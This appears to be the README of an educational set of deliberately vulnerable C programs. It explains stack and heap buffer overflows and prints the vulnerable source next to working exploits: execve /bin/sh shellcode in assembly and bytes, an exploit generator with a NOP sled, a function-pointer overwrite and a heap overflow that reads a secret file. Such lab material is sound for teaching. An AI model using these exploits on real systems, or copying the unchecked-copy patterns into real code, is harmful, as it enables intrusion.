This is a collection of small demo programs written in c that are vulnerable for overflows and exploits.
- Background and general explanations
- Setup
- Hackme 1 executes whatever shellcode is inserted. The attacker can use it to start a shell.
- Hackme 2 checks a password, but a buffer overflow makes it possible to bypass the authentication.
- Hackme 3 has a function pointer that can be overwritten with a buffer overflow, causing the user to hit the jackpot.
- Hackme 4 can be tricked to execute shellcode from the environment variables to print "hacked!"
- Hackme 5 can be manipulated with a buffer overflow to execute code on the stack, in this case to start a new shell.
- Hackme 6 has a heap overflow vulnerability that can be exploited to display the contents of a secret file.
The memory of a program is seperated in different parts, including text for the code, data, bss, heap and stack. The data segment is used for initialized static and global variables, int the bss section, uninitilized static and global variables are stored. The heap is used for dynamic memory accessed with new() or malloc(), and the stack contains local variables and some other information. When a function is executed, it uses the stack to store its variables, parameters for other functions to call, and some information about the control flow. For example, when a function is called, the program has to save the address of the next instruction after the function call, so it can return later and resume the execution of instructions. This address is saved on the stack and later retrieved from there.
Information is also saved in registers. The instruction pointer (called RIP in 64 bit architectures) points to the next instruction the program will execute. The RSP (stack pointer) points to the top of the stack, where variables would be pushed onto or popped from the stack. The RPB (base pointer) points to the beginning of the stack at the very bottom for this specific function. At the location where the RPB points to lies the value of the old RPB of the function that originally called this function, and the return address that is used to jump back.
Some vulnerabilities in code can make it possible to manipulate that stack, e.g. to overwrite the return address, which will cause the programm to jump to a different place in the memory and possibly execute instructions there. One way this can happen is through a buffer overflow. A buffer is a designated block of memory that stores some values of the same type, e.g. an array of integers or a string (a list of chars). The buffer has a certain amount of memory space, but if it is not managed correctly, it might happen that more bytes are written to the buffer than intended, causing the data to overwrite whatever comex next on the stack, maybe even the return address (see image). On the heap, variables are stored as well, and in a similar way, overflows can be used to overwrite values and manipulate the program.
Sometimes, it is possible for an attacker to insert instructions that were not originally part of the program, causing it to do whatever the attacker wants. That is generally done by injection shellcode, binary representations of assembler instructions. When passing shellcode via stdin or as an argument to a program, it is usually cut off at the first null byte. Therefore, the assembler code has to be created in a way that avoids null bytes in the hex representation.
For a comprehensive introduction into the topic of buffer overflows and executing shell code on the stack, see smashing the stack for fun and profit.
To compile the files with the flags, execute
./compile-all.sh
All code is compiled with some flags that make it easier to execute exploits: -fno-stack-protector
to not include stack canaries etc., -z execstack
to make the stack executable, and -O0
to remove optimizations. All exploits are made to execute on a 64 bit architecture and are tested in Ubuntu 18.04. The full command is for example
gcc hackme1.c -o hackme1 -O0 -fno-stack-protector -z execstack -g
. This script also disables ASLR (stack randomization), which helps because the memory addresses will stay the same between two executions of the program.
The exploits are generally executed with ./hackmeX $(./exploitX)
if the exploit is passed as a parameter, or with ./exploitX | ./hackmeX
if it is used as stdin.
There is also a script makeshellcode.sh
, which will automatically generate the bytes of assembly code for the instructions specified in shellcode-creator.c
. It does so by starting the gdb and using its disass function to look at the bytes, to speed up the process of manual inspection. However, it will stop at the first ret
instruction it encounters. As long as you don't use this, it's fine. Otherwise you might just need to figure out the instructions yourself.
To warm up, let's have a look at a program that was made to be exploited. This is the sourcecode for hackme1.c
.
int main(void)
{
char shellcode[] = "[shellcode here]";
(*(void (*)()) shellcode)();
return 0;
}
This very simple program takes some shellcode and executes it. This is possible because the variable shellcode is casted to a function pointer of the type void (*)()
, a function pointer for an unspecified number of parameters. Therefore, the shellcode is cast into a function and then calls it, essentially running the shellcode.
In exploit1.c
, shellcode is inserted that will cause the program to set the registers correctly and then execute a syscall, which will start a new shell. The following assembly commands achieve this while also avoiding any null bytes. There are, however, many other ways to achieve the same goal.
"jmp j2;" //short jump to avoid null bytes in the shellcode
"j1: jmp start;" //jump to the rest of the shellcode
"j2: call j1;" //put the address of the string /bin/sh on the stack
".ascii \"/bin/shX\";"
"start: pop %rdi;" //take the address of the string /bin/sh from the stack
"xor %rax, %rax;" //set RAX to zero
"movb %al, 7(%rdi);" //set a nullbyte after the /bin/sh in the written file
"mov $0x3b, %al;" //put the syscall number in RAX, in this case 0x3b for execve
"xor %rsi,%rsi;" //RSI must be set to zero
"xor %rdx,%rdx;" //RDX must be set to zero
"syscall;" //start the syscall
Since this programm is not actually exploited, but just executes the shellcode itself, just type ./exploit1
to try it out with the shellcode payload.
The first example was created specifically to execute shellcode. From now on, the examples will be programs that have other purposes, but contain vulnerabilities that can be exploited.
Hackme2 contains a buffer overflow vulnerability that can be used to manipulate a variable. The program takes an input as argument and checks if that input is correct, displaying either "password correct" or "wrong password". Of course, it might execute some other functionality, but this is just a minimal example. The goal here is to get the program to execute the code for the correct password, without actually entering the correct password (assuming the hacker doesn't know it). If the program crashes afterwards, that's okay, since the goal was reached already.
The programm can simply be executed with ./hackme2 mypassword
. This is the sourcecode:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int check_password(char *password){
int correct = 0;
char password_buffer[16];
strcpy(password_buffer, password);
if (strcmp(password_buffer, "actualpw") == 0) {
correct = 1;
}
return correct;
}
int main (int argc, char *argv[]) {
if (argc < 2) {
puts("Please enter your password as a command line parameter.");
} else {
if (check_password(argv[1])) {
printf("Password correct.\n");
} else {
printf("Wrong password.\n");
}
}
return 0;
}
In the check_password function, a buffer of length 16 is created to store the password. There is also a variable int correct
that will contain 0 if the password is wrong, or 1 if the password was evaluated to be correct. This local variable is placed on the stack (here at location rbp-8
, directly above the base pointer of the stack). At the end of the function, it is loaded into the register eax, which can be seen in the disassembled code of check_password at location +68. The main function then checks if eax is zero or not (with the test %eax, %eax'
at position +54) and jumps to the different outputs depending on the result. When "actualpw" is passed to the program as paramter, the variable correct
contains 00000001 and is there not zero, causing the program to display "oassword correct".
When the buffer in check_password gets filled with bytes, it grows in the direction of the variable correct
. With a length of 16 bytes, it overwrites the variable to contain e.g. 0x4141414141414141
, which is also evaluated to be not zero, so the main function jumps into the "password correct" branch once more, even though the correct password was never entered.
The programm exploit2
just produces the correct number of bytes as an output. Execute both with ./hackme2 $(./exploit2)
.
This program is a little game that has an element of chance. If two random three-digit numbers are the same, the user will hit the jackpot and get a lot of money. However, the program uses a function pointer to jump to the part in the code where the game is executed. And the length of the username, which is stored in a buffer on the stack, is not checked at all. The function pointer can overwritten just as any other variable. This can be used to the players advantage, making the game give out a jackpot and not even crashing in the process of doing so!
This is the code for the program:
#include "string.h"
#include "stdio.h"
#include "time.h"
#include "stdlib.h"
void jackpot()
{
printf("\n\n$$$ You hit the jackpot!!! $$$\nAll money will be transferred to your account immediately.\n\n");
return;
}
void play()
{
srand(time(0));
int random = rand()%1000;
int number = rand()/10000000;
printf("\n\n======PLAYING THE GAME=====\n");
printf("The lucky number today is: %d\n", random);
printf("You rolled: %d.\n", number);
if (number == random){
jackpot();
} else {
printf("Sadly, this means you didn't win.\n");
}
return;
}
int main()
{
void (*functionptr)();
functionptr = &play;
char name[8]; // first name of the player
printf("Welcome to this game of luck! What is your fist name:\n");
scanf("%s",name);
functionptr();
printf("Game finished.\n");
return 0;
}
The attacker only needs to chose the username in such a way that the buffer spills over to the functionptr, which is saved on the stack directly next to the name buffer. Instead of having the functionptr point to play(), it should instead be made to point to jackpot() directly. The address of jackpot() might start with null bytes, but the attacker only has to overwrite the bytes that need to be changed. The input string \xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xca\x47\x55\x55\x55\x55
sets 8 bytes that can be anything (stored as the user's name), followed by the address of jackpot(). Executing ./hackme3 $(./exploit3)
achieves the same effect. (The address will probably have to be changed for the exploit to work on another system. Just run the program in gdb and use disass jackpot
to see the address that is needed.)
This time, the goal is to make the program execute a syscall that was originally not present in the code. For example, an attacker could cause a printf that prints "hacked" on the screen. To achieve this, the assembler command 'syscall' has to be executed, with the register RSI containing the address of the string that should be printed, RDX containing the length of the string, and RAX and RDX containing the value 1. Possible shellcode for this without using any null bytes could look like this:
eb 02 jmp 0x4
eb 0d jmp 0x11
e8 f9 ff ff ff call 0x2
68 61 63 6b 65 64 21 0a string "hacked!"
5e pop rsi
48 31 c0 xor rax,rax
48 ff c0 inc rax
48 89 c7 mov rdi,rax
48 89 c2 mov rdx,rax
48 c1 e2 03 shl rdx,0x3
0f 05 syscall
The first three instructions save the address of the string on the stack. Then, this address is taken from the stack and put in register rsi. Next, the register RAX is cleared out to contain zero by using XOR with itself. RAX is then set to 1 by using incremet. Then, RDI and RDX are also set to 1 by copying the value from rax. With a shift left of 3 the value in RDX is changed to 8. Finally, the syscall is executed. This code will call printf and print "hacked!" to the screen. It is saved in the file shellcode.bin
.
But how would a hacker put this shellcode into the target program? The whole programm is quite small, and there is only a buffer of 8 bytes.
#include <string.h>
void insecure(char* input){
char buf[8];
strcpy(buf,input);
return;
}
int main(int argc, char *argv[])
{
insecure(argv[1]);
return 0;
}
An attacker can overwrite the RIP stored on the stackframe of insecure() to jump somewhere else and to execute shellcode. However, there is not much space on the stack of the programm to put all the shellcode. There is another option: The attacker can put the shellcode in an environment variable, which will also be accessible on the stack during runtime. This is achieved with the command export SHELLCODE=$(cat shellcode.bin)
. If the program is now run with gdb and the stack is examined way down at the very bottom, the environment variable is actually there.
Now all there is to do is to fill the buffer for the argument to hackme4
with 8 bytes of meaningless content, followed by the 8 byte address of the environment variable on the stack. In exploit4
, there is actually a somewhat flexible function that will calculate this position at runtime, taking the name of the environment variable as an argument. Look at the sourcecode for more details. Now, if the hacker starts the program with ./hackme4 $(./exploit4 SHELLCODE)
, the shellcode calling printf is executed.
For this example, the goal is to execute some arbitrary commands that were not programmed into hackme5.c
. This time, a generous buffer is present, and the shellcode can be placed direclty in the buffer that causes the overflow.
This is the original sourcecode:
#include<stdio.h>
#include<string.h>
int main(int argc, char *argv[])
{
char buf[256];
if (argc < 2)
puts("Please enter your name as a command line parameter.");
else
{
strcpy(buf,argv[1]);
printf("Input was: %s\n",buf);
return 0;
}
}
This program accepts a a parameter and then writes it out again. However, the length of the parameter is not checked, and if it exceeds the 256 byte buffer, an oveflow will occur. This makes it possible to overwrite the return address, causing the programm to jump elsewhere.
More specifically, the programmed can be made to jump up on the stack into the area of the buffer itself. If the buffer was filled with data that can also be interpreted as instructions, they can then be executed. By putting in the instructions to execute a syscall that starts a shell, the programm will do exactly that. Shellcode for starting a new shell was already created for hackme1
, so it can be used again here. exploit5.c
produces a string of bytes that represent this shellcode, which can be filled in the vulnerable program with ./hackme5 $(./exploit5)
.
When the return address is overwritten with an address within the stack, the execution of the programm follows that and jumps into a list of NOP instructions. This 'nop sled' accounts for small variations in the size and position of the stack. The next intructions are there to prepare the syscall execve. In register RAX, the number of the syscall must be placed. Registers RDX and RSI have to be zero for this example. RDI needs to point to a location where a string can be found that contains the name of the programm to execute, in this case /bin/sh
.
Since it is not known exactly at which position this string will end up, the address can be put on the stack by using call
, which was not intended for this hacky purpose, but serves it well. Call will push the address directly after itself on the stack, adjust the stack pointer, and then jump to whatever should be called. By placing the address of the next 'instruction' (in this case the address of the string) on top of the stack, an attacker can get the address of the string at runtime by simply popping it from the stack again. Of course, there are many other solutions to achieve the same outcome. The shellcode presented here contains no null bytes because it has to be passed as a parameter to the programm.
The final shellcode for executing the exploit is generated by exploit.c
. The shellcode starts with a NOP slide (\x90 bytes). The \xaa bytes near the end are for the purpose of aligning the stack correctly.
#include <stdio.h>
#include <string.h>
char shellcode[] = "\xeb\x02\xeb\x0d\xe8\xf9\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\xaa\xaa\xaa\xaa\xaa\xaa\x08\xdd\xff\xff\xff\x7f";
int main()
{
int i;
for (i = 0; i < (256 - strlen(shellcode) + 8 + 6); i++)
{
printf("\x90");
}
printf("%s",shellcode);
return 0;
}
When execute the exploits with ./hackme5 $(./exploit5)
, a new shell is spawned.
This time, the heap is used to create an overflow. There are two files on the file system, public.txt
and secret.txt
. The following program takes the username as an argument, greets the user, and without any intended connection to the username, displays the content of public.txt
. However, since all the data is stored on the heap, an overflow for the username can overwrite the address of the file to read, causing the programm to display the contents of secret.txt
.
This is the sourcecode:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
//a struct to hold information about a file
struct file
{
int id;
char filename[8];
};
//a struct to hold information about a user
struct user
{
int id;
char name[8];
};
int main (int argc, char **argv)
{
if (argc < 2) {
puts("Please enter your name as a command line parameter.");
}
else {
//creating a user and a file
struct user *userptr;
userptr = malloc(sizeof(struct user));
struct file *fileptr;
fileptr = malloc(sizeof(struct file));
fileptr->id = 1;
strcpy(fileptr->filename, "public.txt");
//setting the user information - on the heap, this might overwrite the information of the file
userptr->id = 1;
strcpy(userptr->name, argv[1]);
printf("Welcome, user %s!\n\n", userptr->name);
//opening some file, supposedly the file public.txt
printf("On an unrelated note, opening %s.\n", fileptr->filename);
FILE *readfile;
readfile = fopen (fileptr->filename, "r");
if (readfile == NULL) {
fprintf(stderr, "Error opening file\n\n");
exit (1);
}
//printing the file contents
printf("File was successfully opened. It contains: \n");
int c;
while ((c = getc(readfile)) != EOF)
putchar(c);
putchar('\n');
}
return 0;
}
The space for information about the user is allocated first on the heap, and after that, space for the file is allocated. However, the information about the user is written on the heap later, which makes it possible to simply overwrite what was stored for the file on the heap with new information, e.g. the string "secret.txt" at exactly the place where fileptr->filename
points to, causing the program to load secret.txt.